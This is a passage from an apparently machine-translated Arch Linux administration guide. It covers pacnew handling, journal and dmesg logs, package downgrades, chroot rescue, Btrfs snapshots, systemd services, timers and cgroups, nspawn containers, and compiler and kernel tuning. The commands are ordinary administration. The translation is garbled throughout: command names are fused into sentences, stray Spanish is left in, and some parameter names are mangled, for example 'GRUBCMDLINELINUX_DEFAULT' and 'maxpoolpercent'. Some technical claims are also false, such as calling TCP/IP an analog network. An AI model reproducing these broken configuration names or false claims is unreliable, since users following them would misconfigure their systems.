WINEPREFIX=~/.wine-flstudio winetricks dotnet48 d3dcompiler_47 corefonts vcrun2015

The script will download the official installers. .exeIt will extract the files from Microsoft's servers. .dllreal, and will overwrite them within the prefix, indicating to the registry ( user.reg) that you should use them (Override) instead of using the free Wine implementations.

8.6.3 Windows Registry Editing

Just like in a real system, you can inject keys into the simulated machine's registry to fix bugs (for example, scaling the interface if it looks too small on 4K monitors).

WINEPREFIX=~/.wine-flstudio wine regedit

This isolated, reproducible architecture, controlled by environment variables, allows SysAdmins to package closed Windows applications into double-click executable bash scripts, making hostile proprietary software run tamely in your free environment.

Chapter 9: System Maintenance, Monitoring, and Recovery ↑ Home

One of the most persistent (and unfair) myths about Arch Linux is that it "breaks itself" with every update. This is demonstrably false. Arch Linux doesn't break itself; users break it by not reading, performing partial updates, or ignoring configuration maintenance alerts. In a rolling release model, you are the system administrator. You have complete control, and with it, the responsibility. This chapter will teach you the tools and habits to keep an Arch machine running without reinstalling for a decade.

9.1 Change Management (The .pacnew files) ↑ Home

When the Arch development team (or upstream) decides to change a program's default behavior, they modify its configuration file. But imagine the disaster if you spent 3 hours modifying your SSH server's configuration file ( /etc/ssh/sshd_config) and suddenly, a routine update overwrites your file with the new default file.

To protect your work, Pacman does the following: If it detects that you've modified a configuration file, it doesn't overwrite it . Instead, it installs the new configuration version alongside it and names it with the .pacman extension. .pacnew (For example, /etc/ssh/sshd_config.pacnewThe program will continue to use your original file.

The danger: If you ignore the files .pacnewAfter months or years, a point will be reached where the program's new binary code will require a variable in the configuration file that only exists in the .pacnewAnd since you're still using the old one, the program (or even your boot system) will silently fail.

9.1.1 Professional Resolution with Pacdiff

Never search for pacnew manually. Install the system utilities tool. pacutils(which contains pacdiff) and a visual file merging (Diffing) program such as meld(useful if you're in a graphical environment) or simply use vimdiff(included in Vim).

sudo pacman -S pacutils meld

To search, compare, and merge your configuration files periodically (recommended once a month):

sudo DIFFPROG=meld pacdiff

The script will scan the entire system in one second and, if it finds a .pacnewIt will offer you:

• See the differences.
• Overwrite your old file (if you realize you hadn't changed anything important).
• Delete (Remove) the new file (if you prefer to keep yours forever, at your own risk).
• Merge the lines using meld, opening a window with two columns highlighting the changes so you can drag in the necessary new code without deleting your customizations.

9.2 The Intelligence Center: Reading Logs and dmesg ↑ Home

When something goes wrong in Windows, you often get an incomprehensible hexadecimal code (e.g., 0x80004005). In Linux, the system logs every event in text format. Understanding where to read that code is 90% of the troubleshooting.

9.2.1 The Kernel Buffer (dmesg)

During startup, and while the system is running, the kernel communicates with itself and the drivers even before the registry daemons can start. This is the hardware-level registry (Ring 0). If you have a hard drive about to fail due to mechanical I/O failure, or if you connect a corrupted USB drive, this is where the alarm bells start ringing.

To view kernel messages, use the diagnostic ring:

sudo dmesg -H

(The flag) -HIt makes it human-readable by paginating the output and adding dates. Press space to scroll down. q(to exit). To view live messages while connecting physical devices: sudo dmesg -w.

9.2.2 Systemd Journal (journalctl)

For all user-level software (web server, graphical interface, network failures), systemd collects logs in an ultra-fast, centralized binary file. It's accessed with a Swiss Army knife. journalctl.

• View your current machine's boot log:

    journalctl -b

• View boot errors from the PREVIOUS (-1) to the current one: (Critical when your PC froze completely and you had to force a restart; this will tell you what happened last before the blue screen).

    journalctl -b -1

• Filter only high priority and catastrophic errors (prio 3 = err):

This is the magic command if your PC is running poorly and you don't know why. It clears junk files (information messages) and gives you the raw error codes:

    journalctl -p 3 -xb

• Real-time monitoring of a problematic service: (e.g., you try to connect Bluetooth and it fails on the top panel; you open a terminal and observe the live log).

    journalctl -u bluetooth.service -f

9.3 Version Control: The Art of Downgrading ↑ Home

In a Bleeding Edge model like Arch's, third-party developers will occasionally release code with regressions (bugs that break previously stable features). If after doing a pacman -SyuIf you discover that your browser (e.g., Firefox) is throwing a "Segmentation Fault" and won't open, don't panic or try to reinstall Arch. Fixing it literally requires a 5-second command.

9.3.1 Return to a local version of the cache

As we saw in Chapter 5, Pacman saves all the packets .pkg.tar.zst in /var/cache/pacman/pkg/Unless you explicitly delete them. If your Firefox was broken when installing version 126.0, simply force the old version to install (e.g. 125.0) that you still have stored locally:

# Usa la tecla Tab para autocompletar el nombre largo del archivo
sudo pacman -U /var/cache/pacman/pkg/firefox-125.0-1-x86_64.pkg.tar.zst

This will uninstall the new version and reinstall the old one. But there's a problem: tomorrow, when I do pacman -SyuPacman will see that you have an old version and will try to update it again. To temporarily prevent this, edit /etc/pacman.confand adds firefoxto the line IgnorePkg = firefox(Remember to remove it weeks later when the official bug has been resolved).

9.3.2 The AUR 'downgrade' Tool

If you cleared your cache yesterday, or the package became corrupted, pacman won't help you. For this scenario, there's a wonderful tool called downgrade(available in the AUR). This tool queries the ALA (Arch Linux Archive) servers where the organization stores massive copies of every Arch package from recent years.

yay -S downgrade
sudo downgrade firefox

A menu will appear listing the last 20 versions of Firefox along with their dates. You enter the version number that worked, the script downloads it from the Historical Archive, installs it, and most importantly, asks if you want to automatically add the program to the IgnorePkg .

9.4 The Rescue Chroot (Resurrection of a Fallen System) ↑ Home

Even with best practices, human error can occur (for example, unplugging your PC mid-Linux kernel update or during a GRUB regeneration). When you turn your computer back on, you'll see the dreaded black GRUB Rescue menu, or a "Kernel Panic," and no keys will respond. The operating system is "broken" and cannot boot.

Golden Rule: A Linux system with intact data on the hard drive is never irreparably broken. If you can access the files, you can fix it.

The surgical rescue protocol uses your Arch Linux installation USB:

1. Phase 1: The Bypass. Insert your Arch USB drive (the one you used in Chapter 1) and turn on your PC, booting from it. You are using the kernel from the USB drive, bypassing the corrupted kernel on your hard drive.
2. Phase 2: Connection. Connect to the internet ( iwctlor cable), is indispensable.
3. Phase 3: The Forensic Assembly. Assemble your damaged disks exactly as you did in the first installation:

    mount /dev/nvme0n1p3 /mnt
    mount /dev/nvme0n1p1 /mnt/boot

1. Phase 4: The Injection (Chroot). It enters your broken system like a parasite.

    arch-chroot /mnt

1. Phase 5: The Operation. You are now the root user inside your broken system, and you have internet access, but the machine is only functioning thanks to the USB connection. Here's how you fix the mess:

• Did the kernel become partially corrupted due to a power outage? Reinstall it: pacman -S linux
• Did you update packages but the system froze in the middle? Force a full resynchronization with cross-dependency repair: pacman -Syu
• Did you damage the GRUB bootloader? Reinstall the UEFI binary (as we saw in Chapter 3): grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB and then grub-mkconfig -o /boot/grub/grub.cfg.
• Forgot your Root or User password? Run passwd tu_usuarioYou set a new one and that's it (that's why LUKS disk encryption is so important; anyone with a USB can do this chroot process and change your password if your PC is stolen).

1. Phase 6: The Exit. Close the chroot ( exit), disassembles ( umount -R /mnt) and restart.

Your system will rise from the ashes, perfectly functional, without losing a single byte of data. This is the true power of system control in The Arch Way.

9.5 The Ultimate Safety Net: Btrfs and Snapshots (Snapper) ↑ Home

Everything you've read in this manual about how to fix your system with a rescue USB drive (Chapter 9.4) assumes you have the time and inclination. But what if you're about to give a presentation to investors, and you make a pacman -SyuWhat if the graphics server crashes, and the meeting starts in 2 minutes? You don't have time to do chroot forensics.

Yes, during Chapter 2, you formatted your root partition / file system Using the modern Btrfs , you possess the superpower of Atomic Snapshots .

Btrfs does not overwrite files when you change them (Copy-on-Write). If you install a package, Btrfs saves the new data blocks elsewhere. A "Snapshot" in Btrfs is a simple instant photograph (it takes milliseconds and uses 0 additional kilobytes) of the exact state of your system.

9.5.1 Snapper Installation and Configuration

The tool created by SUSE to manage this magic is snapper.

sudo pacman -S snapper

We created the configuration file for the root ( /):

sudo snapper -c root create-config /

From this moment on, you can tell the operating system: "Photograph the entire C: partition right now":

sudo snapper -c root create --description "Antes de la locura"

9.5.2 Automation with Pacman Hooks

Nobody remembers to take photos before updating. We'll configure it so that pacmanHe can do it himself. We installed the hook:

yay -S snap-pac

The next time you write sudo pacman -SyuBefore downloading a single package, the system will freeze a "Pre" snapshot. Upon completion of the installation, it will freeze a "Post" snapshot. You will be able to use snapper diffto see exactly which disk blocks the update changed.

9.5.3 Time Travel (Rollback at the Start)

If your update breaks your PC, you restart. Thanks to advanced integrations (like grub-btrfsYour GRUB's black menu will have a new section called "Arch Linux Snapshots". You select yesterday afternoon's snapshot, and the system boots exactly as it was yesterday. To make this time jump permanent, you use a restore script (or manual commands on Btrfs subvolumes) to promote the old snapshot to the main disk.

Your Arch Linux has just become literally immortal to software errors.

9.6 Fine Hardware Monitoring and Disaster Prevention ↑ Home

To keep a server or high-performance machine running, you can't wait for the kernel to throw up red alerts. dmesgYou should check for physical stress preventively.

9.6.1 Load Profiling (htop / btop)

UNIX administrators despise the graphical "Task Managers" of desktop environments for their inefficiency and mathematical inaccuracy with CPU threads.

• htop: The timeless classic. Accurately displays process states ( R running, S sleeping, Zzombie), memory page faults, and allows you to instantly fire death signals (SIGKILL -9) at rogue processes.
• btop: The successor in C++. It has a spectacular C-UI (Character-UI) interface in the terminal, drawing continuous graphs of network bandwidth, disk operations (I/O) and temperatures per core, with an update latency of less than 100 milliseconds.

sudo pacman -S btop

9.6.2 Thermodynamics (lm_sensors)

Motherboards contain dozens of temperature sensors (chipsets, north/south bridges, VRMs, CPU cores). Linux must map them.

sudo pacman -S lm_sensors

Run the detection wizard (answer YES to everything, it will analyze your hardware's I2C buses looking for chips):

sudo sensors-detect

From then on, write sensorsThe terminal will show you the exact thermal status of your machine.

9.6.3 Hard Drive Health and Bad Sectors (SMART)

SSDs and NVMe drives don't fail gradually with mechanical clicking sounds. When they die, they do so in a fraction of a second, permanently locking their controller into read-only mode or erasing everything. SMART (Self-Monitoring, Analysis and Reporting Technology) is built into every drive to alert you months before a catastrophic failure.

sudo pacman -S smartmontools

Check the status of your NVMe disk (e.g. /dev/nvme0n1):

sudo smartctl -a /dev/nvme0n1

Pay close attention to the "Percentage Used" and "Critical Warning" lines. If the system detects reallocated sectors (spare blocks dropping), it's an imminent sign to buy a new hard drive and clone the system.

9.6.4 Purging the Journal Limits

Paradoxically, the tool that monitors your PC (systemd journalctl) can end up stifling it. If your Wi-Fi card is throwing an irrelevant error 1000 times per second because its driver is verbose, the journal binary file will grow to gigabytes in size in a month, devouring space on the SSDs of small laptops. Limit the maximum historical size to /etc/systemd/journald.conf:

[Journal]
SystemMaxUse=500M

Restart the demon sudo systemctl restart systemd-journaldThus, Arch will always keep only the most recent half-gigabyte of clinical history, automatically destroying logs from months ago.

Chapter 10: Systemd - Orchestration, Timers, and Advanced Automation ↑ Home

At the heart of almost every modern Linux distribution lies a software suite that inspires both passionate love and deep hatred in the UNIX community: systemd . Originally developed by Lennart Poettering, systemd replaced the older, sequential SysVinit system. Systemd is not just a simple boot program; it's a colossal platform that manages everything from networking and disk mounting to logging, power management (suspend/hibernation), and DNS resolution. It is Process ID 1 (PID 1), the supreme parent of all programs running on your machine.

Mastering systemd means separating the casual user from the systems engineer.

10.1 Architecture and Basic Commands (Systemctl) ↑ Home

The master command to interact with the startup system is systemctlEverything in systemd is organized into "Units". A unit can be a service (a background program, .service), a socket (a listening port, .socket), or a timer (like an alarm clock, .timer).

10.1.1 Service Management (Services)

Traditional daemons like SSHD, Nginx, or NetworkManager are drive files ending in . .service.

Essential commands (assuming we operate on bluetooth.service):

• Start: Turns it on right now. It won't persist if you restart your PC. sudo systemctl start bluetooth.service
• Stop: Turns it off (sends a SIGTERM or SIGKILL signal). sudo systemctl stop bluetooth.service
• Enable: Modifies the system by creating a symbolic link so that the service starts automatically on the next reboot . It does not start it now. sudo systemctl enable bluetooth.service
• Disable: Breaks the connection. It will no longer boot with the system. sudo systemctl disable bluetooth.service
• The Master Shortcut (Enable --now): Combines "enable" and "start". Turns it on now and marks it for future startup. sudo systemctl enable --now bluetooth.service
• Restart: Turns the system off and on. Required after changing a service configuration file (e.g., in Nginx or SSH). sudo systemctl restart bluetooth.service

10.1.2 Targets (The old Runlevels)

In older systems, you used "runlevels" (1 through 6) to tell the PC whether to boot into rescue mode (without graphics) or full mode. Systemd uses the much more flexible concept of "Targets" (Service Groupers).

• multi-user.targetEquivalent to the TTY console level (server without a graphical interface). It groups all network and console services.
• graphical.target: Equivalent to your desktop environment. It depends on the multi-userbut it adds the display managers (GDM/SDDM).
• rescue.target: Starts a root console without network or extra mounted disks (to repair disasters).

If for some reason you want your PC to boot into a pure console by default without starting your heavy graphical environment (to turn a laptop into a server or save battery), you tell systemd to set the default target to the text:

sudo systemctl set-default multi-user.target

(To revert to graphics mode:) sudo systemctl set-default graphical.target).

10.2 Creating Your Own Unit Files ↑ Home

True power comes when you learn that a file .serviceIt's not a complex C program; it's simply a 10-line, easy-to-read text file. As a developer or sysadmin, you'll want your Python script (a Discord bot, a backup, or a Node.js web app) to run continuously in the background, restart if the bot crashes due to a coding error, and launch automatically.

Create a file called mibot.servicein the sacred directory of administrators:

sudo nano /etc/systemd/system/mibot.service

Professional structure of a service in Node.js, for example:

[Unit]
Description=Mi Bot de Discord en Node.js
Documentation=https://mi-wiki-interna.com
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
User=francesc
Group=francesc
WorkingDirectory=/home/francesc/proyectos/mi_bot/
ExecStart=/usr/bin/node index.js
Restart=on-failure
RestartSec=5s
Environment="NODE_ENV=production"
Environment="PORT=8080"

[Install]
WantedBy=multi-user.target

In-depth analysis:

• After=network-online.target(Boot order). This is vital. It tells systemd that if it tries to start the bot at the 2-second mark of boot, but the network (Wi-Fi/Ethernet) isn't available until the 5-second mark, it should put the bot's boot on hold. If you don't set this, the bot will immediately fail due to lack of internet access and won't restart.
• User=francescMinimized privileges (Drop privileges). A web server should NEVER run as root. If someone hacks the bot in Node.js, they will only have access to my user files, not the entire PC.
• Restart=on-failurePure resilience. If the Node.js code crashes or the PC runs out of RAM (OOM Killer), systemd will wait 5 seconds and launch a new, clean process, maintaining infinite uptime without your intervention.

After creating or editing any file in /etc/systemd/The main daemon must reread the directories to integrate the changes before you can use it. systemctl start:

sudo systemctl daemon-reload

10.3 Systemd Timers: The End of the Chron Era ↑ Home

For decades, UNIX administrators used the daemon cronto schedule recurring tasks. You edited a file crontaband you added cryptographic lines of asterisks ( *Cron had terrible limitations: it didn't generate good logs if the script failed, and if you scheduled a backup for Saturdays at 4 AM and your laptop was off, the task would simply be lost (unless you added anacron).

Systemd solved this with Timers . A Timer is a clock that, when the alarm sounds, automatically triggers a file .servicewith the same name. It requires writing more lines, but the control, the visibility of the logs (they go to journalctl) and the reliability are infinitely superior.

The Practical Case: Daily Backup We create the service that performs the backup ( /etc/systemd/system/respaldo.service):

[Unit]
Description=Ejecuta script Rsync de respaldo de documentos

[Service]
Type=oneshot
ExecStart=/usr/bin/bash /home/francesc/scripts/hacer_backup.sh
User=francesc

(Note: Type oneshotThis indicates that the service starts, executes the order, stops, and marks it as successful. It does not run indefinitely.

We created the Timer (alarm clock) with the exact same name ( /etc/systemd/system/respaldo.timer):

[Unit]
Description=Timer para respaldo diario

[Timer]
# Se ejecuta todos los días a las 3:00 de la madrugada
OnCalendar=*-*-* 03:00:00
# Si el PC estaba apagado a las 3AM, hazlo inmediatamente al encenderlo
Persistent=true
# Espera de forma aleatoria hasta 15 minutos (para evitar picos de I/O en servidores)
RandomizedDelaySec=15m

[Install]
WantedBy=timers.target

You reload the daemon, and start and enable THE TIMER (never the service, the timer will take care of launching the service):

sudo systemctl daemon-reload
sudo systemctl enable --now respaldo.timer

To view your system's star calendar and check the precise countdown of all automated tasks:

systemctl list-timers --all

10.4 Performance Audit: systemd-analyze ↑ Home

Systemd knows exactly at what millisecond the kernel started and at what millisecond the graphical environment finished loading. It offers amazing performance profiling utilities for optimization-obsessed administrators.

To see how long it took for your PC to become operational after you pressed the power button:

systemd-analyze

Example output: Startup finished in 3.123s (kernel) + 2.456s (userspace) = 5.579s.

If your system takes 30 seconds to boot (on an SSD) and you feel something is wrong, systemd allows you to generate a list of culprits for each service, ordered by their impact time on boot:

systemd-analyze blame

When reading the list, you'll often find useless services, such as an old disc checker or the infamous NetworkManager-wait-online.service(which blocks startup until it detects a valid real IP address and usually takes 5 to 10 seconds). If you don't have web services that require starting only after the network is statically ready, you can safely disable it:

sudo systemctl disable NetworkManager-wait-online.service

For the visual engineer, systemd can generate a vector graphic (SVG) that draws an exquisitely detailed Gantt chart showing parallelism, threads, and blocking at startup:

systemd-analyze plot > arranque_pc.svg

Open it with your Firefox or Chrome browser and marvel at the orchestrated engineering that occurs in the first three seconds of your Arch Linux's life.

10.5 CPU and Memory Resource Control (cgroups in Systemd) ↑ Home

Systemd is not just a boot initializer; it's a powerful graphical (text-based) interface for the Linux kernel's Control Groups (cgroups) . cgroups are the technology that makes Docker containers possible, and systemd lets you use them directly to tame any troublesome program.

Imagine this scenario: You have an Arch Linux server with 16 GB of RAM. It's running a vital database, and simultaneously, you tell it to process the encoding of a 4K video. The video program will instinctively use 100% of your CPU cores and devour all 16 GB of RAM. The server will freeze (OOM - Out of Memory), and your database's web pages will stop loading for your clients.

You can use systemd to "chain" that service. Open your unit file (e.g. video-encoder.service):

[Unit]
Description=Proceso pesado de video

[Service]
ExecStart=/usr/bin/ffmpeg -i video.mkv salida.mp4
# Limita brutalmente la RAM máxima. Si el proceso pide 2.1G, el kernel lo asesina instantáneamente.
MemoryMax=2G
# Le otorga el derecho a usar un núcleo y medio de CPU, y ni un 1% más, sin importar cuán libre esté el PC.
CPUQuota=150%
# Baja la prioridad del disco duro; si la base de datos quiere leer, el video se pone en pausa.
IOWeight=10

When recharging ( systemctl daemon-reloadThis simple bash script will be subject to the restrictive physical laws of the Linux kernel. The program will think it's running on a computer from 2005. This is the basic architecture of the cloud servers that sell you tiny virtual machines.

10.5.1 Rapid Injection Modification (Drop-in files)

What if the program that's hogging RAM is Firefox, which you didn't install manually, but pacman? If you edit the /usr/lib/systemd/system/firefox.serviceOfficially, pacman will overwrite it in the next update and erase your MemoryMaxThe solution is drop-in files (overwriting files). You run:

sudo systemctl edit firefox.service

A blank editor will open. You write only your injector variables:

[Service]
MemoryMax=8G

Systemd will automatically create a subfolder /etc/systemd/system/firefox.service.d/override.confUpon startup, it will read the official file and merge your rules without destroying it, keeping it safe from updates.

10.6 Systemd-Nspawn: Integrated Containers (The Chroot on Steroids) ↑ Home

If you read Chapter 15 (Docker) and Chapter 9.4 (Arch-chroot), you will have realized that sometimes you need a parallel operating system, but Docker is too complex and adding the Docker daemon uses up extra RAM.

The best-kept secret of Linux distributions is that they come with an ultra-lightweight container system embedded in systemd: systemd-nspawn . It's described as a "Chroot with namespaces and network isolation." Arch engineers use it extensively to compile packages for different architectures or to test viruses/malware in a closed environment without the cumbersome requirements of a virtual machine.

10.6.1 Setting up a pure Debian container inside Arch

Imagine a client requires you to compile an old program, but the necessary libraries are only available in the older Debian or Ubuntu repositories. We'll install the Debian boot tool (debootstrap) on Arch:

sudo pacman -S debootstrap

1. Alien OS Installation:

We created a directory that will act as the "C:" hard drive of our container, and installed the Debian 12 (bookworm) operating system in it.

    mkdir ~/mi_debian
    sudo debootstrap bookworm ~/mi_debian http://deb.debian.org/debian

In 30 seconds, debootstrap will have downloaded a complete Debian base kernel (~300MB).

1. Starting the Nspawn Container:

To "turn on" the machine, we don't use chroot (because it would share your host processes, which is unsafe). We use nspawn, passing it the root directory (D=Directory).

    sudo systemd-nspawn -D ~/mi_debian

In half a second, the prompt will change from [francesc@archlinux] a root@archlinux:~#But it's not Arch. If you run apt updateYou'll see the Debian package manager working. If you run htopYou'll see that the container is isolated: it can't see your Arch Linux processes . You're in a sealed capsule. Exit by typing exit.

10.6.2 Machinectl: Orchestrating Containers

To manage dozens of these nspawns like a pro (just like you would manage Dockers), we use the administrative command machinectl.

If you move your Debian container to the official containers folder ( /var/lib/machines/mi_debian), you can instruct Arch's systemd kernel to treat it as a dependent operating system:

• Start in background: sudo machinectl start mi_debian
• List of lit containers: sudo machinectl list
• Inject yourself (open terminal) into a lit container: sudo machinectl shell mi_debian
• Autostart (so that Debian starts as a service along with your Arch Linux when you turn on your PC): sudo machinectl enable mi_debian

Master cgroups and nspawnIt is possessing divine power over the atoms and processes of distributed computing, all using tools that have always been hidden, by default, in your base Arch Linux installation.

Chapter 11: Extreme Optimization and Hardware Performance ↑ Home

The goal of installing Arch Linux is often not just minimalism, but the ruthless extraction of every last drop of performance from your processor (CPU), memory (RAM), and storage (SSD/NVMe). By avoiding the bloat of other distributions, Arch gives you a clean foundation, but there are kernel-level and compiler levers that remain in conservative positions by default to ensure compatibility with hardware from 15 years ago.

In this chapter, we're going to break that backward compatibility in favor of pure speed, optimizing the generic operating system into a tailor-made suit for your current silicon.

11.1 Memory Management and On-the-Fly Compression (Zram and Zswap) ↑ Home

Historically, when RAM became full, the kernel would "page" (move) static memory blocks to the hard drive (swap partition). In the era of mechanical hard drives, this slowed the machine to unusable levels. In the SSD era, it's faster, but constantly writing gigabytes of memory to the SSD destroys its memory cells (limited write cycles/terabytes written).

The modern solution, born in Android and ChromeOS systems, is to use RAM compression.

11.1.1 Zswap (For systems with a physical Swap partition)

Zswap is a kernel module that acts as a compression cache. When the system decides to swap a memory page to the SSD, Zswap intercepts it, compresses it (to about 30% of its original size using fast algorithms like zstd or lz4), and stores it in reserved space within RAM . If Zswap fills up, it overflows and sends the data to the disk. Zswap is ideal because it leverages your existing swap partition, drastically reducing SSD wear.

To enable it at startup, we edit the kernel parameters in GRUB:

sudo nano /etc/default/grub

Online GRUBCMDLINELINUX_DEFAULTHe adds:

zswap.enabled=1 zswap.compressor=zstd zswap.zpool=z3fold zswap.max_pool_percent=20

• compressor=zstd: Algorithm of very high efficiency and decent speed.
• zpool=z3fold: Allows you to package up to 3 compressed pages onto a single physical page.
• maxpoolpercent=20: Tells Zswap that it can use up to 20% of your total RAM for this emergency compression.

GRUB Update: sudo grub-mkconfig -o /boot/grub/grub.cfgand restart.

11.1.2 Zram (For systems WITHOUT a swap partition on disk)

If you decided to be bold and not create a swap partition on your SSD, Zram is a must. Zram tricks the system by creating an artificial hard drive (Block device) that resides entirely in RAM and applies continuous compression to it. It's the fastest and most modern method, strongly recommended by Fedora.

Installation using the systemd generator:

sudo pacman -S zram-generator

Create the configuration file:

sudo nano /etc/systemd/zram-generator.conf

Add the following:

[zram0]
# Crea un bloque de Zram equivalente al 50% de la RAM total disponible
zram-size = ram / 2
compression-algorithm = zstd
# Úsalo como el Swap de mayor prioridad en el sistema
swap-priority = 100
fs-type = swap

Reload systemd and activate it while hot:

sudo systemctl daemon-reload
sudo systemctl start systemd-zram-setup@zram0.service

Use the command zramctlto monitor in real time how many megabytes you are saving through compression.

11.2 I/O Schedulers and CPU Governors ↑ Home

The Linux kernel acts like an orchestra conductor. It decides which program has the right to communicate with the disk and for how long, and at what speed the processor should vibrate.

11.2.1 The Input/Output Scheduler

Not all disks are the same. A mechanical hard disk drive (HDD) needs a scheduler to read the data physically close to the disk so as not to waste time moving the magnetic read/write head. bfq(Budget Fair Queuing). NVMe SSDs have no moving parts, so the bottleneck is simply how many concurrent commands the memory chip can process. For modern SSDs and NVMe drives, a scheduler is highly recommended. mq-deadlineor the kyber.

Check which scheduler you are using on your disk (e.g., nvme0n1):

cat /sys/block/nvme0n1/queue/scheduler

The selected option will be in brackets, e.g. [none] mq-deadline kyber bfq(On very fast NVMe drives, nonedelegates all the work to the physical disk controller, which is the optimal option).

To force the use of bfq(If you have a slow HDD and notice that your PC freezes when downloading a large file), create a udev rule:

sudo nano /etc/udev/rules.d/60-ioschedulers.rules

Duck:

ACTION=="add|change", KERNEL=="sd[a-z]|mmcblk[0-9]*", ATTR{queue/rotational}=="1", ATTR{queue/scheduler}="bfq"

11.2.2 CPU Governors (cpupower)

Modern CPU scaling technology (P-State on Intel, CPPC on AMD) allows your motherboard to control the voltage. By default, Arch uses the governor. powersavethe schedutilto save energy by lowering the CPU clock to 800 MHz when you're not doing anything, and boosting it to 4.5 GHz when you open a program.

On desktop computers (without a battery to manage), this causes milliseconds of latency that purist gamers despise. You can force perpetual performance mode using cpupower.

sudo pacman -S cpupower

Edit the base configuration ( /etc/default/cpupower) and look for the governor variable:

governor='performance'

Enable the daemon:

sudo systemctl enable --now cpupower.service

(Note: Your PC will be consuming about 15W or 20W more power when idle and will generate more heat, but the system's responsiveness when clicking or opening windows will be absolute.)

11.3 Binary Forging (Optimizing makepkg.conf) ↑ Home

As an Arch Linux user, you'll install dozens of programs from the AUR throughout your lifetime. In doing so, you download plain source code (C, C++, Rust) and use makepkg(the wrapped compiler) to translate it into binary code on your own computer.

By default, Arch developers configure the GNU Compiler Collection (GCC) flags very generically: they assume you want to build a binary compatible with any CPU (from a 2004 Intel Pentium 4 to a 2024 Ryzen 9). To achieve this backward compatibility, GCC disables the use of advanced mathematical vectorization instructions (such as AVX2 and AVX-512) that are physically present in your modern CPU and could perform physics, compression, or cryptography calculations up to 10 times faster.

Let's tell GCC: "Know the hardware you're running on and compile code that only works here, but runs faster than light . "

Open the compiler master file:

sudo nano /etc/makepkg.conf

11.3.1 Native Architecture (CFLAGS and CXXFLAGS)

Find the line that begins with CFLAGS=It will be preconfigured with -march=x86-64 -mtune=generic. Cambial by -march=nativeThis single word activates all the specific silicon components of your chip. We'll also add an additional flag. -O3(Optimization Level 3) which asks GCC to unroll mathematical loops in the source code, consuming more time and RAM during compilation, but generating a final program that runs incredibly fast.

CFLAGS="-march=native -O3 -pipe -fno-plt -fexceptions ..."
CXXFLAGS="$CFLAGS" # C++ copia las mismas banderas que C

11.3.2 LTO (Link Time Optimization)

In a C program, the code is divided into hundreds of small files. Traditionally, the compiler translates them separately and then links them together. If you enable Linked Text (LTO), the compiler reads all the files at once and can see that a function in file A calls a function in file B that doesn't actually do anything, and removes or restructures them. LTO reduces the program's size (RAM) and greatly increases speed.

Look for the line OPTIONS=()at the end of the file. It contains options such as (strip docs !libtool !staticlibs...)Add ltowithout the exclamation mark to activate it:

OPTIONS=(strip docs !libtool !staticlibs emptydirs zipman purge !debug lto)

11.3.3 Parallelism in Compilation (MAKEFLAGS)

If your CPU has 16 threads and you compile a browser like Chromium (which takes 4 hours), by default makepkgIt will use a single core, and it will take... 3 days. We need to tell the program makethat launches as many "workers" as your CPU has logical cores. You can find out how many logical cores you have using the command nproc(Let's say you have an 8-core processor).

Find the variable MAKEFLAGSand disable the comment:

MAKEFLAGS="-j8"

(Pro tip: Pon -j9or the number of your cores + 1. This way, if one core gets stuck waiting to read from the disk, the other thread takes over .

11.3.4 Goodbye to Final Compression

When the compilation of a huge software program is successfully completed, the final step of makepkgIt involves taking all the generated files and compressing them into one file. .pkg.tar.zst so that pacmanInstall it yourself, or give it to a friend. This massive compression (in something like Firefox or Chrome) requires your processor to run at 100% for extended periods.

If you're never going to share your compiled packages with other computers over a network and are only going to install them on your PC, compressing them is a stupid waste of time and energy. Look for the variables PKGEXTTowards the end of the file, tell makepkg to use the humble uncompressed tar format:

PKGEXT='.pkg.tar'

By implementing all these changes, you will have forged an unparalleled software build system. Your AUR packages will compile in minutes using 100% of the processor, generate assembly code perfectly tailored to the mathematical peculiarities of your chip (AVX-512, SSE4), and dispense with unnecessary compression at the end of the process.

You've fine-tuned your Arch Linux like a Formula 1 car.

11.4 Underlying Memory Acceleration (HugePages and PGO) ↑ Home

The standard Linux operating system manages RAM by dividing it into 4-kilobyte "pages." If a program like a virtual machine, a 20GB database, or a modern open-world game needs 8 gigabytes of RAM, the processor has to fetch, scan, and map 2 million separate pages. This causes a phenomenon called "TLB Miss" (Translation Lookaside Buffer Miss) within your CPU, resulting in micro-stutters and massive latency bottlenecks.

11.4.1 Transparent HugePages (THP)

The architectural solution is to use HugePages. The kernel allows memory to be grouped into blocks of 2 Megabytes, and even 1 Gigabyte.

By default, Arch Linux has THP in a state madvise(They are only activated if a program explicitly requests it from the kernel.) For heavy loads, we can force the kernel to always try to group memory into large blocks transparently.

We'll create a rule to inject this behavior when the machine is powered on. Use systemd-tmpfiles:

sudo nano /etc/tmpfiles.d/thp.conf

Add the following system command:

w /sys/kernel/mm/transparent_hugepage/enabled - - - - always
w /sys/kernel/mm/transparent_hugepage/defrag - - - - defer+madvise

Upon reboot, the kernel will map giant blocks. In console emulators (RPCS3, Yuzu/Ryujinx) or in Redis databases, the performance improvement can exceed 15% immediately.

11.4.2 Profile-Guided Optimization (PGO)

We mentioned -O3in the previous chapter for the compiler. But GCC isn't a mind reader. It doesn't know how you use a program. Profile-Guided Optimization (PGO) is the ultimate compiler wizardry. The process works like this:

1. You compile your C/C++ code by adding an instrumented flag ( -fprofile-generate).
2. The compiler generates a "spy" program (very slow).
3. You use that program for a few minutes, making it do the most demanding tasks (opening windows, calculating routes). The program saves statistical files (profiles).
4. You recompile the original source code, but this time with the flag -fprofile-usefeeding it the files from step 3.

The compiler now statistically knows that mathematical function A is called 1 million times per second, and function B is never called. GCC will reorder the binary code, placing function A right at the top of your CPU's L1 cache. Browsers like Firefox and the Linux kernel itself can be compiled with PGO and LTO simultaneously (via the AUR using packages like firefox-pgo), achieving an agility that borders on the absurd.

11.5 Optimizing the TCP/IP Network Stack (Ring 0) ↑ Home

Even if your Internet Service Provider (ISP) promises you "1 Gigabit," it's very likely that your download speeds and response times are being throttled by your computer's motherboard. The Linux kernel uses network congestion control algorithms by default, designed in the 1980s for unreliable analog networks (such as TCP/IP).

If we use Arch Linux, we can enable the algorithms designed by Google for its own YouTube servers (TCP BBR), created explicitly to maximize bandwidth and sink latency.

11.5.1 TCP BBR (Bottleneck Bandwidth and RTT)

BBR doesn't try to guess if the network is congested by counting lost packets (as the old algorithm does). BBR continuously measures how fast the pipeline can send data and pumps it at a precise mathematical rate to never fill the buffer (avoiding internal bufferbloat).

To enable BBR persistently, we will inject kernel parameters by modifying sysctl:

sudo nano /etc/sysctl.d/99-bbr.conf

Add the following network engineering lines:

net.core.default_qdisc = fq
net.ipv4.tcp_congestion_control = bbr

